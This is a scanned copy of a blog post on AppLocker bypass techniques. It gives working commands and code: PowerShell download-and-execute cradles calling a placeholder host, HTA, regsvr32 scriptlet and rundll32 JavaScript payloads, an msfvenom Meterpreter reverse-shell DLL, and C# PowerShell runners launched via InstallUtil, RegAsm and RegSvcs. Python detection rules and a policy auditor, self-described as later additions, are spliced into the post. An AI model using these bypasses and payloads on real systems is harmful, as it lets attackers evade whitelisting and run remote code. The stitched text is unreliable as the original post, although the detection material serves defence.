evi1cg.me (2606:50c0:8001::153), public scan

Submitted URL: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
Effective URL: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html
Submission: On October 10 via api from BE; scanned from DE

Evi1cg's blog

APPLOCKER BYPASS TECHNIQUES

Posted on 2016-09-12 | Category: Tricks

Source:
https://www.youtube.com/watch?v=z04NXAkhI4k


0X00 COMMAND AND POWERSHELL NOT BLOCKED, SCRIPTS BLOCKED

1. RUN DIRECTLY WITH CMD / POWERSHELL

Powershell:

IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Command:

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')


2. PIPES

Powershell:

Get-Content script.ps1 | iex

Command:

cmd.exe /K < payload.bat


3. HTA

payload.hta

<HTML>
<HEAD>
<script language="VBScript">
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"
</script>
</HEAD>
<BODY>
</BODY>
</HTML>





4. REGSVR32.EXE

regsvr32 /u /n /s /i:payload.sct scrobj.dll

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

payload.sct:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            rat="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')";
            new ActiveXObject("WScript.Shell").Run(rat,0,true);
        ]]>
    </script>
</registration>
</scriptlet>





5. RUNDLL32

payload:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

6. DLL/CPL

payload.dll

msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

Run:

rundll32 shell32.dll,Control_RunDLL payload.dll

Rename the DLL to .cpl and double-click it to run.


7. NISHANG FILE BACKDOOR

nishang client

http://drops.wooyun.org/tips/8568
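Every technique in this section runs through a signed Windows binary (powershell.exe, cmd.exe, mshta.exe, regsvr32.exe, rundll32.exe), so the defensive counterpart is watching process-creation telemetry for the command-line shapes shown above. The following Python is an added example and is not part of the original post: it applies a small rule set to process-creation events. The input format is assumed (one JSON object per line with Image, ParentImage and CommandLine fields, roughly what a Sysmon Event ID 1 forwarder emits), and the sample events are constructed to mirror the commands in sections 1 to 6 plus two benign lines that should not fire.

```python
"""Flag process-creation events matching the host/command-line shapes in this section.

Added example, not from the original post. Input format is assumed: one JSON
object per line with Image, ParentImage and CommandLine fields, roughly what a
Sysmon Event ID 1 forwarder produces. The sample events below are constructed.
"""
import json
import re

# Rule = (name, Image regex, ParentImage regex, CommandLine regex); None = unchecked.
# Patterns are applied case-insensitively and every given pattern must match.
RULES = [
    # Download cradle that every payload on this page ends in.
    ("powershell_download_cradle", r"\\powershell(\.exe)?$", None,
     r"net\.webclient|downloadstring|downloadfile"),
    # Execution policy bypassed on the command line.
    ("powershell_exec_bypass", r"\\powershell(\.exe)?$", None,
     r"-(exec|executionpolicy|ep)\s+bypass"),
    # Script text piped into iex / Invoke-Expression (section 2). Only visible here
    # when passed via -c; interactive use needs script block logging (Event 4104).
    ("powershell_pipe_to_iex", r"\\powershell(\.exe)?$", None,
     r"\|\s*(iex|invoke-expression)\b"),
    # cmd.exe fed its commands from a redirected file (section 2).
    ("cmd_stdin_redirect", r"\\cmd\.exe$", None, r"/[kc]\s*<"),
    # Any child of the HTA host (section 3).
    ("mshta_child_process", None, r"\\mshta\.exe$", None),
    # regsvr32 loading a scriptlet via scrobj.dll, locally or over HTTP (section 4).
    ("regsvr32_scriptlet", r"\\regsvr32\.exe$", None, r"scrobj\.dll|/i:https?://"),
    # rundll32 running inline JavaScript through mshtml (section 5).
    ("rundll32_javascript", r"\\rundll32(\.exe)?$", None, r"javascript:|runhtmlapplication"),
    # rundll32 Control_RunDLL pointed at a file outside System32 (section 6).
    # Heuristic: real control-panel launches reference a .cpl under System32.
    ("rundll32_control_rundll_untrusted", r"\\rundll32(\.exe)?$", None,
     r'control_rundll\s+(?!\s*"?[a-z]:\\windows\\system32\\)'),
]


def match_rule(rule, event):
    """True when every non-None pattern in the rule matches its event field."""
    _, image_re, parent_re, cmd_re = rule
    fields = ((image_re, "Image"), (parent_re, "ParentImage"), (cmd_re, "CommandLine"))
    return all(pattern is None or re.search(pattern, event.get(field, ""), re.IGNORECASE)
               for pattern, field in fields)


def scan(lines):
    """Return [(line_number, rule_name), ...] for every rule hit over JSON-lines input."""
    hits = []
    for number, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip it rather than stop the pipeline
        hits.extend((number, rule[0]) for rule in RULES if match_rule(rule, event))
    return hits


# Constructed sample events; lines 2-6 mirror this section, lines 7-8 are benign.
SAMPLE_EVENTS = r'''
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /K < payload.bat"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"}
{"Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll"}
{"Image": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "rundll32 shell32.dll,Control_RunDLL payload.dll"}
{"Image": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\timedate.cpl\""}
{"Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "regsvr32 /s C:\\Program Files\\Vendor\\vendor.dll"}
'''

if __name__ == "__main__":
    for number, name in scan(SAMPLE_EVENTS.splitlines()):
        print(f"line {number}: {name}")
```

The Control_RunDLL rule is deliberately a heuristic: it ignores launches that spell the system directory as %SystemRoot% or %windir%, so tune it against your own baseline before alerting on it. The mshta rule fires on any child process, which is the cheapest place to catch the HTA variant because the powershell.exe command line looks identical to section 1.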


0X01 EXECUTABLE DIRECTORIES

Scan for writable paths with a PowerShell script.

Download: http://go.mssec.se/AppLockerBC

Scanning the executable paths:

Executing from one of them to bypass AppLocker:


0X02 AFTER POWERSHELL IS BLOCKED

Configure a rule that blocks powershell:

Opening powershell again after it is blocked:


1. RUN POWERSHELL VIA .NET

Bypass by running PowerShell through .NET:

C# template
powershell.cs


using System;
using System.Management.Automation;

namespace Powershell
{
    class Program
    {
        static void Main(string[] args)
        {
            // Runs the string "payload" through Invoke-Expression in an in-process
            // PowerShell runspace instead of launching powershell.exe.
            PowerShell ps = PowerShell.Create();
            ps.AddCommand("Invoke-Expression");
            ps.AddArgument("payload");
            ps.Invoke();
        }
    }
}

The compiled exe cannot be run directly, but placed in an executable directory it runs and invokes PowerShell.


2. INSTALLUTIL

Reference 1: http://drops.wooyun.org/tips/8862

Reference 2: http://drops.wooyun.org/tips/8701

InstallUtil.cs


using System;
using System.Management.Automation;

namespace Whitelist
{
    class Program
    {
        static void Main(string[] args)
        {
        }
    }
}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    // The methods can be Uninstall/Install. Install is transactional, and really unnecessary.
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        PowerShell ps = PowerShell.Create();
        ps.AddCommand("Invoke-Expression");
        ps.AddArgument("payload");
        ps.Invoke();
    }
}




After compiling, run it with the /U parameter:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe





3. REGASM & REGSVCS

Regasm.cs

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Management.Automation;

namespace regsvcser
{
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

        [ComUnregisterFunction] // This executes if registration fails
        public static void UnRegisterClass(string key)
        {
            PowerShell ps = PowerShell.Create();
            ps.AddCommand("Invoke-Expression");
            ps.AddArgument("payload");
            ps.Invoke();
        }
    }
}




Usage:

Create Your Strong Name Key -> key.snk

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe Regasm.dll
//Executes UnRegisterClass If you don't have permissions

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U Regasm.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Regasm.dll
//This calls the UnregisterClass Method





4. NISHANG FILE BACKDOOR

Even though PowerShell is blocked, shellcode can still be executed, for example via HTA, macros and similar vectors.


0X03 PRIVILEGE ESCALATION

Once escalated to administrator, the AppLocker restrictions can be broken and exes and scripts run.
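Sections 0x01 to 0x03 all come down to what the Exe rule collection actually decides for a given file and user: the default rules allow everything under the Windows and Program Files folders for Everyone and everything anywhere for Administrators, so a Deny rule on powershell.exe leaves InstallUtil.exe, RegAsm.exe and RegSvcs.exe (all under %WINDIR%) allowed, and an administrator is allowed to run from any writable directory. The following Python is an added example, not part of the original post: a simplified evaluator for AppLocker FilePathRule policies (publisher and hash rules are ignored, and the path-variable expansions, host locations, SIDs and placeholder rule Ids are assumptions) that audits a policy equivalent to the one described in 0x02 against the hosts named on this page, and a hardened variant that denies the .NET and HTA hosts as well.

```python
"""Audit an AppLocker Exe policy for the script/assembly hosts named in this post.

Added example, not from the original post. Only FilePathRule rules are evaluated
(publisher and hash rules are ignored), with AppLocker's precedence: an
applicable Deny wins, exceptions carve out an Allow, and a file matched by no
rule is blocked when the collection is enforced. Variable expansions, host paths,
SIDs and the placeholder rule Id are constructed assumptions.
"""
import fnmatch
import xml.etree.ElementTree as ET

# AppLocker path variables and the concrete roots they are assumed to cover.
VARIABLES = {
    "%WINDIR%": [r"C:\Windows"],
    "%SYSTEM32%": [r"C:\Windows\System32"],
    "%PROGRAMFILES%": [r"C:\Program Files", r"C:\Program Files (x86)"],
    "%OSDRIVE%": ["C:"],
}
EVERYONE, ADMINISTRATORS = "S-1-1-0", "S-1-5-32-544"
STANDARD_USER = {EVERYONE}
ADMIN_USER = {EVERYONE, ADMINISTRATORS}


def path_matches(pattern, path):
    """Case-insensitive AppLocker-style glob match after variable expansion."""
    patterns = [pattern]
    for var, roots in VARIABLES.items():
        if pattern.upper().startswith(var):
            patterns = [root + pattern[len(var):] for root in roots]
    return any(fnmatch.fnmatchcase(path.lower(), p.lower()) for p in patterns)


def evaluate(policy_xml, collection, path, user_sids):
    """Return 'Allow', 'Deny', 'NoRule' or 'NotEnforced' for one file and one user."""
    decision = "NoRule"
    for coll in ET.fromstring(policy_xml).iter("RuleCollection"):
        if coll.get("Type") != collection:
            continue
        if coll.get("EnforcementMode") != "Enabled":
            return "NotEnforced"  # audit-only or not configured: nothing is blocked
        for rule in coll.findall("FilePathRule"):
            if rule.get("UserOrGroupSid") not in user_sids:
                continue
            conds = rule.find("Conditions")
            if conds is None or not any(path_matches(c.get("Path"), path)
                                        for c in conds.iter("FilePathCondition")):
                continue
            exc = rule.find("Exceptions")
            if exc is not None and any(path_matches(c.get("Path"), path)
                                       for c in exc.iter("FilePathCondition")):
                continue
            if rule.get("Action") == "Deny":
                return "Deny"  # an applicable Deny always wins
            decision = "Allow"
    return decision


def path_rule(action, sid, path, name):
    # The Id is a constructed placeholder; real rules need a unique GUID.
    return (f'<FilePathRule Id="00000000-0000-0000-0000-000000000000" Name="{name}" '
            f'Description="" UserOrGroupSid="{sid}" Action="{action}">'
            f'<Conditions><FilePathCondition Path="{path}"/></Conditions></FilePathRule>')


def build_policy(rules):
    return ('<AppLockerPolicy Version="1"><RuleCollection Type="Exe" EnforcementMode="Enabled">'
            + "".join(rules) + "</RuleCollection></AppLockerPolicy>")


# The three default Exe rules plus the "block powershell.exe" rule from section 0x02.
DEFAULT_RULES = [
    path_rule("Allow", EVERYONE, r"%PROGRAMFILES%\*", "(Default Rule) Program Files"),
    path_rule("Allow", EVERYONE, r"%WINDIR%\*", "(Default Rule) Windows folder"),
    path_rule("Allow", ADMINISTRATORS, "*", "(Default Rule) All files, Administrators"),
]
POWERSHELL_DENY = path_rule("Deny", EVERYONE,
                            r"%SYSTEM32%\WindowsPowerShell\v1.0\powershell.exe", "Block powershell.exe")
POLICY_AS_IN_POST = build_policy(DEFAULT_RULES + [POWERSHELL_DENY])
# Same policy with the .NET hosts and the HTA host from this post explicitly denied.
HARDENED_POLICY = build_policy(DEFAULT_RULES + [POWERSHELL_DENY] + [
    path_rule("Deny", EVERYONE, "%WINDIR%\\Microsoft.NET\\*\\" + exe, "Block " + exe)
    for exe in ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe")
] + [path_rule("Deny", EVERYONE, r"%SYSTEM32%\mshta.exe", "Block mshta.exe")])

# Hosts named in this post and their usual locations (assumed).
HOSTS = {
    "powershell.exe": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "mshta.exe": r"C:\Windows\System32\mshta.exe",
    "regsvr32.exe": r"C:\Windows\System32\regsvr32.exe",
    "rundll32.exe": r"C:\Windows\System32\rundll32.exe",
    "InstallUtil.exe": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
    "RegAsm.exe": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    "RegSvcs.exe": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
}


def audit(policy_xml, user_sids=STANDARD_USER):
    """Decision the Exe collection gives each host for a user holding these SIDs."""
    return {name: evaluate(policy_xml, "Exe", path, user_sids) for name, path in HOSTS.items()}


if __name__ == "__main__":
    for label, policy in (("as in post", POLICY_AS_IN_POST), ("hardened", HARDENED_POLICY)):
        print(label, audit(policy))
```

Running the audit on the first policy shows exactly the gap section 0x02 exploits: powershell.exe is denied while the three .NET utilities are still allowed by the Windows-folder default rule. The same evaluator shows the 0x03 point, since a file in a user-writable directory gets NoRule for a standard user but Allow for an administrator. Deny rules scoped to Everyone also bind administrators, so scope them to the group that actually needs restricting, and note that blocking the hosts does not stop a custom exe loaded from an allowed directory from hosting System.Management.Automation.dll itself, which is a DLL-collection concern.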

------ End of article, thanks for reading ------
 * Author: Evi1cg
 * Link: https://evi1cg.github.io/archives/AppLocker_Bypass_Techniques.html
 * License: Unless otherwise stated, all articles on this blog are licensed under BY-NC-SA. Please credit the source when reposting!

© 2015 – 2022 Evi1cg